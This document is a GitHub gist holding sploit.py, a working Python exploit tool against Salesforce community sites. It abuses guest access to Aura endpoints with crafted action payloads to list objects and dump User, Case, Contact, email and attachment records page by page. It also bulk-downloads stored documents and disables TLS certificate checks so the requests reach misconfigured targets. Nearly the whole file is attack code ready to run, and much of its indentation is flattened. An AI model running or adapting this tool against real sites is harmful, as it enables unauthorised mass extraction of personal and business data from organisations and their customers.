@sfboss
Last active June 7, 2024 08:39
sploit.py
import mimetypes
import requests
import urllib.request
import urllib.parse
from urllib.error import URLError, HTTPError
import json
from json import JSONDecodeError
import argparse
import re
import os
import sys
import ssl
from termcolor import colored
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
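# The context above turns off hostname and certificate checks, so requests will
# also go through against self-signed or misconfigured community domains.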
AURA_PATH_PATTERN = ("aura", "s/aura", "s/sfsites/aura", "sfsites/aura")
PAYLOAD_PULL_CUSTOM_OBJ = '{"actions":[{"id":"pwn","descriptor":"serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData","callingDescriptor":"UNKNOWN","params":{}}]}'
SF_OBJECT_NAME = (
"Case",
"Account",
"User",
"Contact",
"Document",
"ContentDocument",
"ContentVersion",
"ContentBody",
"CaseComment",
"Note",
"Employee",
"Attachment",
"EmailMessage",
"CaseExternalDocument",
"Attachment",
"Lead",
"Name",
"EmailTemplate",
"EmailMessageRelation",
)
DEFAULT_PAGE_SIZE = 100
MAX_PAGE_SIZE = 1000
DEFAULT_PAGE = 1
USER_AGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36"
def http_request(url, values="", method="GET"):
headers = {"User-Agent": USER_AGENT}
if method == "POST":
headers["Content-Type"] = "application/x-www-form-urlencoded"
data = urllib.parse.urlencode(values)
data = data.encode("ascii")
request = urllib.request.Request(url, data=data, method=method, headers=headers)
else:
request = urllib.request.Request(url, method=method, headers=headers)
response_body = ""
try:
with urllib.request.urlopen(request, context=ctx) as response:
response_body = response.read().decode("utf-8")
except URLError as e:
raise
return response_body
def check(url):
    # Probe each known Aura path; an "aura:invalidSession" response means the
    # framework rejected our empty token, i.e. a live Aura endpoint exists there.
    aura_endpoints = []
    for path in AURA_PATH_PATTERN:
        tmp_aura_endpoint = urllib.parse.urljoin(url, path)
        try:
            response_body = http_request(tmp_aura_endpoint, values={}, method="POST")
        except HTTPError as e:
            response_body = e.read().decode("utf-8")
        if "aura:invalidSession" in response_body:
            aura_endpoints.append(tmp_aura_endpoint)
    return aura_endpoints
def get_aura_context(url):
response_body = ""
try:
response_body = http_request(url)
except Exception as e:
print("[-] Failed to access the url")
raise
if ("window.location.href ='%s" % url) in response_body:
location_url = re.search(r"window.location.href =\'([^\']+)", response_body)
url = location_url.group(1)
try:
response_body = http_request(url)
except Exception as e:
print("[-] Failed to access the redirect url")
raise
aura_encoded = re.search(r"\/s\/sfsites\/l\/([^\/]+fwuid[^\/]+)", response_body)
if aura_encoded is not None:
response_body = urllib.parse.unquote(aura_encoded.group(1))
fwuid = re.search(r'"fwuid":"([^"]+)', response_body)
markup = re.search(r'"(APPLICATION@markup[^"]+)":"([^"]+)"', response_body)
app = re.search(r'"app":"([^"]+)', response_body)
    if fwuid is None or markup is None or app is None:
        raise Exception("Couldn't find fwuid, app, or markup in the page source")
aura_context = '{"mode":"PROD","fwuid":"' + fwuid.group(1)
aura_context += '","app":"' + app.group(1) + '","loaded":{"' + markup.group(1)
aura_context += '":"' + markup.group(2) + '"},"dn":[],"globals":{},"uad":false}'
return aura_context
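# Example of the context string get_aura_context() rebuilds; <fwuid>, <app> and
# <hash> are placeholders scraped from the target page, not real identifiers:
# {"mode":"PROD","fwuid":"<fwuid>","app":"<app>",
#  "loaded":{"APPLICATION@markup://<app>":"<hash>"},"dn":[],"globals":{},"uad":false}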
def dynamic_file_download(url, contentid, folderpath, title):
    # Download a ContentDocument binary through the shepherd servlet.
    theurl = f"{url}/sfc/servlet.shepherd/document/download/{contentid}?operationContext=S1"
    output_filename = ""
    fullpath = ""
    response = requests.get(theurl, headers={"User-Agent": USER_AGENT}, stream=True)
    if response.status_code == 200:
        content_type = response.headers.get("content-type", "")
        # guess a file extension from the Content-Type header
        extension = mimetypes.guess_extension(content_type, strict=False)
        if extension is None:
            if "png" in content_type:
                extension = ".png"
            elif "jpeg" in content_type:
                extension = ".jpg"
            elif "pdf" in content_type:
                extension = ".pdf"
            elif "text" in content_type:
                extension = ".txt"
            else:
                extension = ".bin"
        # prefer the record's own title when it already carries an extension
        if title is not None and "." in title:
            output_filename = title
        elif title:
            output_filename = "output_({}){}".format(title, extension)
        else:
            output_filename = "output_{}{}".format(contentid, extension)
        fullpath = folderpath + output_filename
        with open(fullpath, "wb") as out_file:
            out_file.write(response.content)
        status = "success"
    else:
        status = "failed"
    # return the filename and full path to the file
    return {
        "filename": output_filename,
        "fullpath": fullpath,
        "id": contentid,
        "title": title,
        "status": status,
    }
def get_url_from_folder(foldername):
    # Best-effort heuristic that turns a dump folder name back into a site url.
    # The replace chain below is order-sensitive and lossy; verify results manually.
    siteurl = foldername.replace("sploits/", "")
    siteurl = siteurl.replace("https_", "https://")
siteurl = siteurl.replace("com__", "com_")
siteurl = siteurl.replace("com_", "com/")
siteurl = siteurl.replace("com_s_", "com/s/")
siteurl = siteurl.replace("_s_", "/s/")
siteurl = siteurl.replace("_s", "/s")
siteurl = siteurl.replace("/s_", "/s/")
siteurl = siteurl.replace("/s//", "/s/")
return siteurl
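# Worked example of the heuristic above (hypothetical folder name):
#   get_url_from_folder("sploits/https_example.my.site.com_s_")
#   -> "https://example.my.site.com/s/"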
def process_content_documents_all(filepath):
    # Walk the sploits folder; for each subfolder, read the ContentDocument__*.json
    # dumps and download every referenced document into a content/ subfolder.
    import pandas as pd  # local import: pandas is only needed for the results CSV

    for folder, subfolders, files in os.walk(filepath):
        links = []
        theurl = get_url_from_folder(folder)
        theurl = theurl.replace(".gov_", ".gov")
        print(colored("Starting to process files: " + theurl, "green"))
        resultsexist = os.path.exists(folder + "/content/results.csv")
        if resultsexist:
            print(colored("Results already exist for this folder, skipping", "red"))
        else:
            try:
                for file in files:
                    # only ContentDocument__*.json dumps (e.g. ContentDocument__page1.json) hold download targets
                    if "ContentDocument__" in file:
                        # open the dump and read it as json
                        with open(folder + "/" + file) as json_file:
                            thedata = json.load(json_file)
                        for record in thedata["result"]:
                            links.append(
                                {
                                    "id": record["record"]["Id"],
                                    "title": record["record"]["Title"],
                                }
                            )
                        if len(links) > 0:
                            # create the content/ dir if it doesn't exist
                            if not os.path.exists(folder + "/content/"):
                                os.makedirs(folder + "/content/")
                            # track the outcome of each download attempt
                            df = pd.DataFrame(columns=["id", "title", "result"])
                            for link in links:
                                print(theurl)
                                print(link["id"])
                                result = dynamic_file_download(
                                    theurl, link["id"], folder + "/content/", link["title"]
                                )
                                df = pd.concat(
                                    [
                                        df,
                                        pd.DataFrame(
                                            [[link["id"], link["title"], result["status"]]],
                                            columns=["id", "title", "result"],
                                        ),
                                    ]
                                )
                            # save the results to a csv and echo them
                            df.to_csv(folder + "/content/results.csv", index=False)
                            print(df)
            except Exception as e:
                print(colored("Error processing files (%s): %s" % (theurl, e), "red"))
        print(
            colored(
                "Done trying to process files (count "
                + str(len(links))
                + "): "
                + theurl,
                "green",
            )
        )
def process_content_documents(filepath):
    # Walk the sploits folder; for each subfolder, collect the record Ids from its
    # ContentDocument__*.json dumps and write them to an ids.txt in that folder.
    for folder, subfolders, files in os.walk(filepath):
        theids = []
        for file in files:
            if "ContentDocument__" in file:
                # open the dump and read it as json
                with open(folder + "/" + file) as json_file:
                    thedata = json.load(json_file)
                for record in thedata["result"]:
                    theids.append(record["record"]["Id"])
        # write ids.txt for the folder
        with open(folder + "/" + "ids.txt", "w") as outfile:
            json.dump(theids, outfile)
def create_payload_for_getItems(object_name, page_size, page):
payload = '{"actions":[{"id":"pwn","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"'
payload += object_name
payload += '","layoutType":"FULL",'
payload += '"pageSize":%s' % page_size
payload += ',"currentPage":%s' % page
payload += ',"useTimeout":false,"getCount":true,"enableRowActions":false}}]}'
return payload
def create_payload_for_getRecord(record_id):
    payload = '{"actions":[{"id":"pwn","descriptor":"serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord","callingDescriptor":"UNKNOWN","params":{"recordId":"'
    payload += record_id
    payload += '","record":null,"inContextOfComponent":"","mode":"VIEW","layoutType":"FULL","defaultFieldValues":null,"navigationLocation":"LIST_VIEW_ROW"}}]}'
    return payload
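# For reference, create_payload_for_getItems("User", 100, 1) renders to this
# single-line JSON (wrapped here for readability):
# {"actions":[{"id":"pwn","descriptor":"serviceComponent://ui.force.components
#   .controllers.lists.selectableListDataProvider
#   .SelectableListDataProviderController/ACTION$getItems",
#   "callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"User",
#   "layoutType":"FULL","pageSize":100,"currentPage":1,"useTimeout":false,
#   "getCount":true,"enableRowActions":false}}]}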
def exploit(aura_endpoint, payload, aura_context):
    url = aura_endpoint + "?r=1&applauncher.LoginForm.getLoginRightFrameUrl=1"
    values = {
        "message": payload,
        "aura.context": aura_context,
        "aura.token": "undefined",
    }
    response_body = http_request(url, values=values, method="POST")
    try:
        response_json = json.loads(response_body)
    except JSONDecodeError:
        raise Exception("JSON Decode error. Response -> %s" % response_body)
    return response_json
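# The endpoint replies with JSON shaped roughly as below; the field names come
# from how the callers parse the response, the rest is illustrative:
# {
#   "actions": [{"id": "pwn", "state": "SUCCESS", "returnValue": {...}}],
#   "exceptionEvent": false
# }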
def pull_object_list(aura_endpoint, aura_context):
    print("[+] Pull the object list")
    sf_all_object_name_list = []
    try:
        response = exploit(aura_endpoint, PAYLOAD_PULL_CUSTOM_OBJ, aura_context)
        if response.get("exceptionEvent") is True:
            raise Exception(response)
        if (
            response.get("actions") is None
            or response.get("actions")[0].get("state") is None
        ):
            raise Exception("Failed to get actions: %s" % response)
        api_names_to_prefixes = (
            response.get("actions")[0].get("returnValue").get("apiNamesToKeyPrefixes")
        )
        sf_default_object_name_list = [
            key for key in api_names_to_prefixes.keys() if not key.endswith("__c")
        ]
        sf_custom_object_name = [
            key for key in api_names_to_prefixes.keys() if key.endswith("__c")
        ]
        sf_all_object_name_list = list(api_names_to_prefixes.keys())
    except Exception as e:
        print("[-] Failed to pull the object list.")
        print("[-] Error: %s" % e)
    else:
        print("[+] Default object list")
        print(sf_default_object_name_list)
        print("[+] Custom object list")
        print(sf_custom_object_name)
    return sf_all_object_name_list
def dump_record(aura_endpoint, aura_context, record_id):
    print("[+] Dumping the record")
    payload = create_payload_for_getRecord(record_id)
    try:
        response = exploit(aura_endpoint, payload, aura_context)
    except Exception as e:
        print("[-] Failed to dump the record: %s" % e)
        return None
    if response.get("actions")[0].get("state") != "SUCCESS":
        return None
    print("[+] State: %s" % response.get("actions")[0].get("state"))
    print("[+] Record result: ")
    print(
        json.dumps(
            response.get("actions")[0].get("returnValue"), ensure_ascii=False, indent=2
        )
    )
def dump_object(
aura_endpoint,
aura_context,
object_name,
page_size=DEFAULT_PAGE_SIZE,
page=DEFAULT_PAGE,
):
print('[+] Getting "%s" object (page number %s)...' % (object_name, page))
payload = create_payload_for_getItems(object_name, page_size, page)
try:
response = exploit(aura_endpoint, payload, aura_context)
        if response.get("exceptionEvent") is True:
            raise Exception(response)
except Exception as e:
print("[-] Failed to exploit.")
print("[-] Error: %s" % e)
return None
    try:
        actions = response.get("actions")[0]
        state = actions.get("state")
    except (TypeError, IndexError):
        return None
    return_value = actions.get("returnValue")
    try:
        total_count = return_value.get("totalCount")
        result_count = return_value.get("result") or []
    except AttributeError:
        total_count = "None"
        result_count = []
    print(
        "[+] State: %s, Total: %s, Page: %s, Result count: %s"
        % (state, total_count, page, len(result_count))
    )
    if state == "ERROR":
        print("[+] Error message: %s" % actions.get("error")[0])
    return response
def dump_and_save_objects(aura_endpoint, aura_context, output_dir, flag_full):
sf_all_object_name_list = pull_object_list(aura_endpoint, aura_context)
if flag_full:
page_size = MAX_PAGE_SIZE
else:
page_size = DEFAULT_PAGE_SIZE
failed_object = []
dumped_object_count = 0
for object_name in sf_all_object_name_list:
page = DEFAULT_PAGE
while True:
response = dump_object(
aura_endpoint, aura_context, object_name, page_size, page
)
if response is None:
failed_object.append(object_name)
break
return_value = response.get("actions")[0].get("returnValue")
file_path = os.path.join(
output_dir, "%s__page%s.json" % (object_name, page)
)
with open(file_path, "w", encoding="utf_8") as fw:
try:
fw.write(json.dumps(return_value, ensure_ascii=False, indent=2))
dumped_object_count += 1
except Exception as e:
failed_object.append(object_name)
page += 1
if (
flag_full is False
or return_value is None
or return_value.get("result") is None
):
break
if len(return_value.get("result")) < page_size:
break
if len(failed_object) > 0:
print(
"[-] Failed to dump '%s' object. Please try manually with -o option."
% ", ".join(failed_object)
)
    # treat the dump as successful if more than half of the objects were saved
    return dumped_object_count > (len(sf_all_object_name_list) / 2)
def init():
parser = argparse.ArgumentParser(
description="Exploit Salesforce through the aura endpoint with the guest privilege"
)
parser.add_argument(
"-u", "--url", type=str, help="set the SITE url. e.g. http://url/site_path"
)
parser.add_argument(
"-o",
"--objects",
help='set the object name. Default value is "User" object. Juicy Objects: %s'
% ",".join(SF_OBJECT_NAME),
nargs="*",
default=["User"],
)
parser.add_argument(
"-l", "--listobj", help="pull the object list.", action="store_true"
)
parser.add_argument(
"-c", "--check", help="only check aura endpoint", action="store_true"
)
parser.add_argument("-a", "--aura_context", help="set your valid aura_context")
    parser.add_argument(
        "-r", "--record_id", help="set the record id to dump the record"
    )
parser.add_argument(
"-d",
"--dump_objects",
help="dump a small number of objects accessible to guest users and saves them in the file.",
action="store_true",
)
parser.add_argument(
"-f",
"--full",
help="if set with -d, dump all pages of objects.",
action="store_true",
)
parser.add_argument(
"-s",
"--skip",
help="if set with -d, skip the objects already dumped.",
action="store_true",
)
parser.add_argument(
"-v", "--vacuum", help="delete empty results in sploits.", action="store_true"
)
    parser.add_argument(
        "--content",
        help="download the documents referenced by ContentDocument dumps in sploits.",
        action="store_true",
    )
args = parser.parse_args()
return args
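# Example invocations (hypothetical target URL):
#   python sploit.py -u https://example.my.site.com/s/ -c      # check endpoints only
#   python sploit.py -u https://example.my.site.com/s/ -l      # list pullable objects
#   python sploit.py -u https://example.my.site.com/s/ -o User Case
#   python sploit.py -u https://example.my.site.com/s/ -d -f   # full paged dump
#   python sploit.py --vacuum                                  # prune empty dumps
#   python sploit.py --content                                 # download documents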
if __name__ == "__main__":
args = init()
# aura_endpoint
if args.content:
process_content_documents_all("sploits")
    elif args.vacuum:
        # Recursively walk the sploits folder and delete any json file whose
        # "result" array is missing or empty, so only dumps with records remain.
        for root, dirs, files in os.walk("sploits"):
            for file in files:
                if file.endswith(".json"):
                    try:
                        with open(os.path.join(root, file), "r") as f:
                            data = json.load(f)
                        # if the file is null or has no results, delete it
                        if (
                            data is None
                            or data.get("result") is None
                            or len(data["result"]) == 0
                        ):
                            os.remove(os.path.join(root, file))
                            print(
                                "[-] Deleted empty result file: %s"
                                % os.path.join(root, file)
                            )
                    except Exception as e:
                        print("[-] Error: %s" % e)
                        continue
else:
aura_endpoints = check(args.url)
        if len(aura_endpoints) == 0:
            print("[-] URL doesn't seem to be vulnerable - not_vuln - done")
            sys.exit(0)
        else:
            print("[+] %s seems to be vulnerable - is_vuln - done" % (aura_endpoints))
if args.check:
sys.exit(0)
print("[+] Start exploit")
if args.aura_context is not None and len(args.aura_context) > 1:
aura_context = args.aura_context
else:
try:
aura_context = get_aura_context(args.url)
except Exception as e:
print("[-] Failed to get aura context.")
sys.exit(0)
result = False
for aura_endpoint in aura_endpoints:
print("-----")
print("[+] Endpoint: %s" % aura_endpoint)
if args.listobj:
sf_all_object_name_list = pull_object_list(aura_endpoint, aura_context)
elif args.record_id:
dump_record(aura_endpoint, aura_context, args.record_id)
elif args.dump_objects:
if result and args.skip:
print("[+] Skip to dump")
continue
url = urllib.parse.urlparse(args.url)
urlpath = url.path.replace("/", "_")
urlnetloc = url.netloc.replace(":", "_")
output_dir = os.path.join(
os.getcwd(), url.scheme + "_" + urlnetloc + "_" + urlpath
)
os.makedirs(output_dir, exist_ok=True)
result = dump_and_save_objects(
aura_endpoint, aura_context, output_dir, args.full
)
elif args.objects:
for object_name in args.objects:
response = dump_object(aura_endpoint, aura_context, object_name)
if response is None:
continue
return_value = response.get("actions")[0].get("returnValue")
print("[+] Result: ")
print(json.dumps(return_value, ensure_ascii=False, indent=2))
else:
print("[-] No arguments provided.")
sys.exit(0)
print("-----")